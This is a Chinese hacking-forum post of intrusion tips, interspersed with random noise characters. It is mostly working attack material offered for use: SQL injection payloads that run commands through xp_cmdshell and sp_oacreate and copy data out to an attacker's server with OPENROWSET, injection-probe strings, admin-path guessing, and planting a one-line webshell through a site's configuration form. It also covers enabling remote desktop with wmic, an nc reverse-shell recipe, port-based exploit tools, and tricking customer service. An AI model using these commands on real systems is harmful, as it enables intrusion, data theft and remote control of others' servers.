SA点数据库分离技术相关& D4 m6 `% A1 |- V$ w' k: W
" Q C0 y4 S( z+ f: T
/ m, e. K' y6 eSA点数据库分离搞法+语句:
& Q) ]5 x' ]7 [* j) u0 T: T$ j6 @' G+ U+ z1 i* d, h+ y& F: Y
注射点不显错,执行下面三条语句页面都返回正常。7 n) h- f3 d1 l
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'); C5 _) C! P* E j5 M: M) }( _. y$ w
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')! O* i/ O0 R" M2 {3 B
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
6 ^, Z P+ _ v5 J: v- b可以列目录,判断系统为2000,web与数据库分离" f9 P! K5 e; j% p0 {- ^
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
# H5 @; F& R# ]$ G, E* u* ^# o1 _在注射点上执行
% m) q1 r6 W2 K7 f) k, K$ z; Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--' I2 m" r. l) ?* X" j4 b
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
+ m9 S$ _+ Z" k$ i+ f/ g还有我用NC监听得其他端口都没有得到IP。( c Y- ]/ [8 j+ H3 H$ J7 {
& l% e# K$ ]1 p$ o$ W
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) | f* S/ x9 H9 x4 }
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
6 @3 R' q1 q8 _
. F$ p8 J7 g" n" O% };insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--! J9 b( [9 Y c: p" F
* y! L. G$ J6 E
现在就猜想是不是数据库是内网而且不能连外网。 Q* |2 g% F( D
' O. r, P: p" `! d
& z8 X$ P# e% |6 c# S
access导出txt文本代码! x* s: q& Z5 ~* P
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
( A! _' h. U9 T6 w7 r; j$ ?4 [5 K- o& H9 F
5 s3 \ s; d) m
6 A2 j" [: H5 D3 ^
自动跳转到指定网站代码头: b% H6 x$ ~4 K7 |6 z( R
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>3 {5 ?4 ~2 ^3 k& {" r: O
, `$ k$ d( z, h* D9 Z: O$ F) G
/ I; N# @6 J- ^入侵java or jsp站点时默认配置文件路径:: \6 i. z& ?7 Z$ O! A1 P
\web-inf\web.xml( b7 G5 Y; i7 K, y$ L2 h
tomcat下的配置文件位置:% \5 e7 Y1 s, R
\conf\server.xml (前面加上tomcat路径)- q- [; ~; d* \
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml }4 W) H/ O8 W" d. m
, ]+ q0 s6 h+ c8 V9 K& a: d( @( n- S% ~" \
1 [' K6 r, V% D3 z- b8 X
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:3 W+ \5 F5 A; L2 A
-1%23
, y8 |! Y& N6 g( v4 ?: a> 1 x% ]7 l9 G: J- C
<+ n8 F r" ]: R
1'+or+'1'='1
7 U& N7 {7 [* Zid=8%bf: B! z d4 f! g) r
8 {+ r% U" n v' r. Z全新注入点检测试法:4 s, X! @, C7 B6 r# s3 T. ]- D
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
# {& Y) R0 s( s, J& w) K* K
4 `. T. R4 h) `2 C/ Q* [. n在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
2 t# q1 G/ X1 {! _ o( T7 \5 B+ {" e9 {2 I c
搜索型注入判断方法:
5 b3 z+ Y. ?0 U北京%' and '1'='1' and '%'='9 G2 S* K4 c3 B/ k$ W' R/ s! H/ [! S
北京%' and '1'='2' and '%'='" k' d) {9 Y [5 q& R
3 ]$ ?4 S# n7 b7 S
' B( A8 U& B" RCOOKIES注入:
0 V3 A* @- u" ~- Z& m% g) T
1 |* q; z1 W3 Cjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
0 i! t1 p7 Q. y d9 N' v- w; S- B- {5 _
2000专业版查看本地登录用户命令:
/ D& U ~: D9 Q. knet config workstation
9 U2 _) [! P+ Z! h8 B, l" e+ h5 x' ~ t x. |) f; f* {
, d" J W- X$ }/ w$ j- l
2003下查看ipsec配置和默认防火墙配置命令:
7 O5 H! N5 }( Q, r" rnetsh firewall show config
0 S( d1 [9 H2 \8 C% knetsh ipsec static show all3 q) \( \4 e5 p8 U
3 d" a1 s/ Q5 E5 F; A不指派指定策略命令:
# V! y" Z& Z2 }- h+ e1 Enetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
4 e, P4 U. _ W# H% L- l0 P. onetsh ipsec static show policy all 显示策略名
+ Z; d( M2 s; J7 s- i
- d l& }. {& q5 L2 K! M
5 A2 ]" j5 V' g# I猜管理员后台小技巧:
4 C! `5 |% K1 V8 ~/ ~2 J3 [admin/left.asp " a- _9 `4 F0 C
admin/main.asp$ G- B) y6 Y: [, h. E6 r: K5 E
admin/top.asp( l- s: f% Y Q4 ?2 i- {
admin/admin.asp * ^5 D" e3 s4 k9 u3 O0 U* f
会现出菜单导航,然后迅雷下载全部链接# g2 f# Y; E6 C5 H t# h: a
" ?+ y* ]& D5 b. e0 N4 Q, h
0 C- l7 m" C) w" I! o) w社会工程学:" b) w: q& M1 X: B( C. L
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
! w, d* q/ s# T# b' m; a9 v然后去骗客服# o R$ |! f. I. W3 H
' \/ ^+ K0 l. }/ }" v
- ^7 Q$ H2 d3 U+ B3 c- s. r) X统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 3 b; J/ R) C8 d* p$ c/ d' S
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ' e- y6 u+ x* H4 H
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。* v( f( B W6 N$ Y& i. l- o
8 W0 ?1 ^# Z$ G9 }3 \$ V$ D
& A. ?6 y/ [: E D& R
7 U, K7 Z' @0 p2 |6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)4 n0 j2 G1 k- c: X+ F k
4 y) C$ ?1 C& ^8 W5 Q) ?2 \3 @
3 l. w4 D' Y8 j6 n B% M; Q
7 B) ?- c- p! BCMD加密注册表位置
; ~1 @# T2 {( N- r( U# l9 f(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
$ F& ^! k# }' uAutoRun
% g. D' m5 m$ Y. f! n1 A' B
$ a' A) g$ ^& O(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor8 d* {7 O# o+ F r9 l" h. O. u C, B
AutoRun* @/ I7 S0 A, }% m/ a4 `
/ n2 [4 v- Y8 G: q2 ]; ^0 f: E
! t l' K7 ~ L/ x, L) V. c
在找注入时搜索Hidden,把他改成test2 t. s/ W6 c; u+ P
- s" z' x$ Q$ p
) k) M4 u) f; n, t9 B* u. z& E. Q8 x2 i% W' y4 r$ Z
mstsc /v:IP /console + A* s% h% i, `( d* g
1 T( m/ _% v4 K0 ^% ]# \
9 g) j/ @% i# L
一句话开3389:! v9 \% s; a# V9 n7 b7 D
4 D5 w7 w" C$ |" c1 @
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 8 V. ^3 w# O" u \5 s
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.( e: E! V2 q) _& L+ F
% g% U. i3 R0 E& R$ S1 [( C5 z+ V1 j" ?) a% ^7 Y" r; \
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:. |' x7 C# M4 H5 I/ G
Insert into admin(user,pwd) values('test','test')
. |2 u) N" I! ?0 H& B3 D7 f% a9 A S* X
# O6 l# J) x" y n$ x5 `4 cNC反弹! y6 @) p5 Z( J
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
+ Y% v- o' M! u8 B4 g$ L& x H然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
) E K& q' v! d# r$ L* I$ J5 `$ a" U2 a5 u8 _; _' _/ j1 h
* f! k( g* h0 ^! S: L
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题+ @* V" m% q# Y
( f8 s9 U; B7 f
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录1 o* X d# i' p# p- G% H
例如:
8 M6 F! m3 ^0 p. esubst k: d:\www\ 用d盘www目录替代k盘
: I, k! c( k- C$ dsubst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对